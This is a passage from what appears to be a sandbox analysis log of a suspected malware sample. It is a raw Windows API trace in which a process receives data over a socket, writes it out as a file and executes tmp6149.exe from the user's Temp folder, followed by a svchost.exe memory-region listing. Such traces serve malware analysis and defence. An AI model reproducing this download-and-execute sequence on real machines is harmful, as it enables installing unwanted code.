returned 48 [0102.906] recv (in: s=0x4e0, buf=0x33d65c0, len=4096, flags=0 | out: buf=0x33d65c0*) returned 4096 [0103.022] setsockopt (s=0x4e0, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0103.023] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 34600 [0103.026] WriteFile (in: hFile=0x1cc, lpBuffer=0x33edeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c68d1d8, lpOverlapped=0x0 | out: lpBuffer=0x33edeb8*, lpNumberOfBytesWritten=0x1c68d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0103.026] WriteFile (in: hFile=0x1cc, lpBuffer=0x33ddef7*, nNumberOfBytesToWrite=0x8631, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33ddef7*, lpNumberOfBytesWritten=0x1c68d238*=0x8631, lpOverlapped=0x0) returned 1 [0103.027] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 65536 [0103.116] WriteFile (in: hFile=0x1cc, lpBuffer=0x33dde00*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33dde00*, lpNumberOfBytesWritten=0x1c68d238*=0x10000, lpOverlapped=0x0) returned 1 [0103.117] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 14620 [0103.117] WriteFile (in: hFile=0x1cc, lpBuffer=0x33dde00*, nNumberOfBytesToWrite=0x391c, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33dde00*, lpNumberOfBytesWritten=0x1c68d238*=0x391c, lpOverlapped=0x0) returned 1 [0103.118] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 63572 [0103.176] WriteFile (in: hFile=0x1cc, lpBuffer=0x33dde00*, nNumberOfBytesToWrite=0xf854, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33dde00*, lpNumberOfBytesWritten=0x1c68d238*=0xf854, lpOverlapped=0x0) returned 1 [0103.177] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 8292 [0103.177] WriteFile (in: hFile=0x1cc, lpBuffer=0x33dde00*, nNumberOfBytesToWrite=0x2064, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33dde00*, lpNumberOfBytesWritten=0x1c68d238*=0x2064, lpOverlapped=0x0) returned 1 [0103.177] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 23494 [0103.183] WriteFile (in: hFile=0x1cc, lpBuffer=0x33dde00*, nNumberOfBytesToWrite=0x5bc6, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33dde00*, lpNumberOfBytesWritten=0x1c68d238*=0x5bc6, lpOverlapped=0x0) returned 1 [0103.183] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 60808 [0103.183] WriteFile (in: hFile=0x1cc, lpBuffer=0x33dde00*, nNumberOfBytesToWrite=0xed88, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33dde00*, lpNumberOfBytesWritten=0x1c68d238*=0xed88, lpOverlapped=0x0) returned 1 [0103.185] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 2764 [0103.195] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 24876 [0103.196] WriteFile (in: hFile=0x1cc, lpBuffer=0x33edeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c68d1d8, lpOverlapped=0x0 | out: lpBuffer=0x33edeb8*, lpNumberOfBytesWritten=0x1c68d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0103.196] WriteFile (in: hFile=0x1cc, lpBuffer=0x33de334*, nNumberOfBytesToWrite=0x5bf8, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33de334*, lpNumberOfBytesWritten=0x1c68d238*=0x5bf8, lpOverlapped=0x0) returned 1 [0103.196] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 38696 [0103.237] WriteFile (in: hFile=0x1cc, lpBuffer=0x33dde00*, nNumberOfBytesToWrite=0x9728, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33dde00*, lpNumberOfBytesWritten=0x1c68d238*=0x9728, lpOverlapped=0x0) returned 1 [0103.238] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 20730 [0103.238] WriteFile (in: hFile=0x1cc, lpBuffer=0x33dde00*, nNumberOfBytesToWrite=0x50fa, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33dde00*, lpNumberOfBytesWritten=0x1c68d238*=0x50fa, lpOverlapped=0x0) returned 1 [0103.239] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 3472 [0103.242] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 65536 [0103.246] WriteFile (in: hFile=0x1cc, lpBuffer=0x33edeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c68d1d8, lpOverlapped=0x0 | out: lpBuffer=0x33edeb8*, lpNumberOfBytesWritten=0x1c68d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0103.246] WriteFile (in: hFile=0x1cc, lpBuffer=0x33de070*, nNumberOfBytesToWrite=0xfd90, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33de070*, lpNumberOfBytesWritten=0x1c68d238*=0xfd90, lpOverlapped=0x0) returned 1 [0103.249] recv (in: s=0x4e0, buf=0x33dde00, len=65536, flags=0 | out: buf=0x33dde00*) returned 65536 [0103.249] WriteFile (in: hFile=0x1cc, lpBuffer=0x33dde00*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x1c68d238, lpOverlapped=0x0 | out: lpBuffer=0x33dde00*, lpNumberOfBytesWritten=0x1c68d238*=0x10000, lpOverlapped=0x0) returned 1 [0103.250] recv (in: s=0x4e0, buf=0x33dde00, len=26371, flags=0 | out: buf=0x33dde00*) returned 26371 [0103.250] SetEvent (hEvent=0x398) returned 1 [0103.330] CoTaskMemAlloc (cb=0x104) returned 0x32bf40 [0103.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32bf40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.348] CoTaskMemAlloc (cb=0x104) returned 0x32bf40 [0103.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32bf40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.348] CoTaskMemFree (pv=0x32bf40) [0103.445] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", nBufferLength=0x105, lpBuffer=0x1c68d440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", lpFilePart=0x0) returned 0x30 [0103.446] SetErrorMode (uMode=0x1) returned 0x1 [0103.446] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c68d6a0 | out: lpFileInformation=0x1c68d6a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc7648600, ftCreationTime.dwHighDateTime=0x1d48db2, ftLastAccessTime.dwLowDateTime=0xe0a33b20, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xe0fb4e00, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x7fa00)) returned 1 [0103.446] SetErrorMode (uMode=0x1) returned 0x1 [0103.446] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", nBufferLength=0x105, lpBuffer=0x1c68da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", lpFilePart=0x0) returned 0x30 [0103.446] SetErrorMode (uMode=0x1) returned 0x1 [0103.446] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c68dc40 | out: lpFileInformation=0x1c68dc40*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc7648600, ftCreationTime.dwHighDateTime=0x1d48db2, ftLastAccessTime.dwLowDateTime=0xe0a33b20, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xe0fb4e00, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x7fa00)) returned 1 [0103.447] SetErrorMode (uMode=0x1) returned 0x1 [0103.447] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", nBufferLength=0x105, lpBuffer=0x1c68d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", lpFilePart=0x0) returned 0x30 [0103.447] SetErrorMode (uMode=0x1) returned 0x1 [0103.447] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c68dbc0 | out: lpFileInformation=0x1c68dbc0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc7648600, ftCreationTime.dwHighDateTime=0x1d48db2, ftLastAccessTime.dwLowDateTime=0xe0a33b20, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xe0fb4e00, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x7fa00)) returned 1 [0103.447] SetErrorMode (uMode=0x1) returned 0x1 [0103.448] CoTaskMemAlloc (cb=0x104) returned 0x32bf40 [0103.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32bf40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.448] CoTaskMemFree (pv=0x32bf40) [0103.449] CoTaskMemAlloc (cb=0x104) returned 0x32bf40 [0103.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32bf40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.450] CoTaskMemFree (pv=0x32bf40) [0103.454] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x1c68d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0103.455] SetErrorMode (uMode=0x1) returned 0x1 [0103.455] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c68d810 | out: lpFileInformation=0x1c68d810*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.455] SetErrorMode (uMode=0x1) returned 0x1 [0103.455] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x1c68d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0103.455] SetErrorMode (uMode=0x1) returned 0x1 [0103.455] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c68d810 | out: lpFileInformation=0x1c68d810*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xbcc623c0, ftLastAccessTime.dwHighDateTime=0x1d48db2, ftLastWriteTime.dwLowDateTime=0xbcc623c0, ftLastWriteTime.dwHighDateTime=0x1d48db2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.455] SetErrorMode (uMode=0x1) returned 0x1 [0103.470] LocalAlloc (uFlags=0x0, uBytes=0x62) returned 0x1b787da0 [0103.471] RtlMoveMemory (in: Destination=0x1b787da0, Source=0x34380f8, Length=0x62 | out: Destination=0x1b787da0) [0103.471] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1b7e5e50 [0103.471] RtlMoveMemory (in: Destination=0x1b7e5e50, Source=0x3441f70, Length=0x34 | out: Destination=0x1b7e5e50) [0103.801] LocalFree (hMem=0x1b787da0) returned 0x0 [0103.801] LocalFree (hMem=0x1b7e5e50) returned 0x0 [0103.907] NtQueryInformationProcess (in: ProcessHandle=0x5b4, ProcessInformationClass=0x0, ProcessInformation=0x3442858, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x3442858, ReturnLength=0x0) returned 0x0 [0103.910] EnumProcesses (in: lpidProcess=0x34428a0, cb=0x400, lpcbNeeded=0x1c68e070 | out: lpidProcess=0x34428a0, lpcbNeeded=0x1c68e070) returned 1 [0103.920] SetEvent (hEvent=0x3d0) returned 1 [0103.920] SetEvent (hEvent=0x3c4) returned 1 [0103.920] SetEvent (hEvent=0x3c8) returned 1 [0103.920] SetEvent (hEvent=0x3cc) returned 1 [0103.920] SetEvent (hEvent=0x3e0) returned 1 [0103.920] SetEvent (hEvent=0x3d4) returned 1 [0103.920] SetEvent (hEvent=0x3d8) returned 1 [0103.920] SetEvent (hEvent=0x3dc) returned 1 [0103.920] SetEvent (hEvent=0x3e4) returned 1 [0103.920] CoUninitialize () Thread: id = 43 os_tid = 0xaac Thread: id = 44 os_tid = 0xab0 Thread: id = 45 os_tid = 0xab4 [0058.047] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0058.050] ResetEvent (hEvent=0x398) returned 1 Thread: id = 103 os_tid = 0x86c [0103.480] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0103.495] ShellExecuteExW (in: pExecInfo=0x3442558*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", lpParameters=0x0, lpDirectory="C:\\Users\\aETAdzjz\\Desktop", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x3442558*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", lpParameters=0x0, lpDirectory="C:\\Users\\aETAdzjz\\Desktop", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x5b4)) returned 1 [0103.708] CoGetContextToken (in: pToken=0x1cb2f5f0 | out: pToken=0x1cb2f5f0) returned 0x0 [0103.709] CoUninitialize () Thread: id = 105 os_tid = 0x874 [0104.178] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0104.181] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0104.203] VirtualQuery (in: lpAddress=0x1d63d8a0, lpBuffer=0x1d63e760, dwLength=0x30 | out: lpBuffer=0x1d63e760*(BaseAddress=0x1d63d000, AllocationBase=0x1ccb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0104.248] VirtualQuery (in: lpAddress=0x1d63db50, lpBuffer=0x1d63ea10, dwLength=0x30 | out: lpBuffer=0x1d63ea10*(BaseAddress=0x1d63d000, AllocationBase=0x1ccb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0104.254] SetEvent (hEvent=0x4f0) returned 1 [0104.254] SetEvent (hEvent=0x58c) returned 1 [0104.254] SetEvent (hEvent=0x550) returned 1 [0104.254] SetEvent (hEvent=0x4f0) returned 1 [0104.254] SetEvent (hEvent=0x58c) returned 1 [0104.254] SetEvent (hEvent=0x55c) returned 1 [0104.254] SetEvent (hEvent=0x54c) returned 1 [0104.254] SetEvent (hEvent=0x544) returned 1 [0104.254] SetEvent (hEvent=0x554) returned 1 [0104.254] SetEvent (hEvent=0x5a8) returned 1 [0104.254] CoUninitialize () Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x745e000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x8bc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1074 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1075 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1076 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1077 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1078 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1079 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1080 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1081 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1082 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1083 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1084 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1085 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 1086 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1087 start_va = 0x140000 end_va = 0x143fff entry_point = 0x140000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1088 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1089 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1090 start_va = 0x170000 end_va = 0x19ffff entry_point = 0x170000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 1091 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x1a0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1092 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1093 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1094 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1095 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1096 start_va = 0x350000 end_va = 0x3b5fff entry_point = 0x350000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1097 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1098 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1099 start_va = 0x650000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1100 start_va = 0x7e0000 end_va = 0x89ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1101 start_va = 0x8a0000 end_va = 0xc92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1102 start_va = 0xca0000 end_va = 0xcbbfff entry_point = 0xca0000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 1103 start_va = 0xcc0000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 1104 start_va = 0xd40000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 1105 start_va = 0xdc0000 end_va = 0xdc0fff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1106 start_va = 0xdd0000 end_va = 0xdd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 1107 start_va = 0xde0000 end_va = 0xde0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 1108 start_va = 0xdf0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1109 start_va = 0xe40000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 1110 start_va = 0xed0000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 1111 start_va = 0xf50000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1112 start_va = 0x1010000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 1113 start_va = 0x1060000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 1114 start_va = 0x10e0000 end_va = 0x13aefff entry_point = 0x10e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1115 start_va = 0x13d0000 end_va = 0x144ffff entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1116 start_va = 0x1450000 end_va = 0x14cffff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 1117 start_va = 0x1520000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 1118 start_va = 0x15a0000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 1119 start_va = 0x1620000 end_va = 0x169ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 1120 start_va = 0x16e0000 end_va = 0x175ffff entry_point = 0x0 region_type = private name = "private_0x00000000016e0000" filename = "" Region: id = 1121 start_va = 0x1760000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 1122 start_va = 0x1810000 end_va = 0x188ffff entry_point = 0x0 region_type = private name = "private_0x0000000001810000" filename = "" Region: id = 1123 start_va = 0x1890000 end_va = 0x190ffff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 1124 start_va = 0x1940000 end_va = 0x19bffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 1125 start_va = 0x19e0000 end_va = 0x1a5ffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1126 start_va = 0x1a60000 end_va = 0x1adffff entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 1127 start_va = 0x1b00000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 1128 start_va = 0x1b90000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 1129 start_va = 0x1c60000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 1130 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1131 start_va = 0x1e20000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1132 start_va = 0x1ea0000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 1133 start_va = 0x1fa0000 end_va = 0x201ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1134 start_va = 0x2020000 end_va = 0x2362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 1135 start_va = 0x2370000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 1136 start_va = 0x2550000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 1137 start_va = 0x2630000 end_va = 0x26affff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1138 start_va = 0x2770000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 1139 